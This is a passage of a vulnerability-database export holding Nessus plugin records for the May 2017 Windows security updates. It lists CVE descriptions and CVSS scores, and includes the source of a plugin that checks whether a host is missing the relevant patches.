(CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n \"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n 
\"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. 
(CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. 
(CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, 
as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n 
\"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. 
A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft 